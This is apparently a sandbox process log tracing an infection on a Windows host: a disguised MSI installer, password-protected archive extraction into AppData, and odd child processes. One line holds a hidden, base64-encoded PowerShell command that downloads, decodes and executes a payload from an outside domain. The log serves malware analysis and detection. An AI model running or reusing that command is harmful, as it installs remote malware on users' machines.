"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=7744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7504 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\desktop-1920x1080.jpg" /ForceBootstrapPaint3D
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\desktop-1920x1080.jpg" /ForceBootstrapPaint3D
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\_x64__x32__installer__.zip"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A4E1F0BDBC29017E2BAFA3A41C9F21D9
C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe
"C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\"
C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe
"C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe explorer.exe
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 28D303C2E11E68AD8D1F8225C1D3F397
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAyADQAMAA3AC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb3f8746f8,0x7ffb3f874708,0x7ffb3f874718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=audio --mojo-platform-channel-handle=5644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=video_capture --mojo-platform-channel-handle=4052 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=3592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\0680d99cd3e9932de4429d04bbbf6032e8b670700d70d758d9377e899552fc9a.zip"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dd7893c7eed9662f479225efff35609cf555c810c5cb0b1e316af2b2e88131ac.zip"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6700 /prefetch:2
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dd7893c7eed9662f479225efff35609cf555c810c5cb0b1e316af2b2e88131ac.zip"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
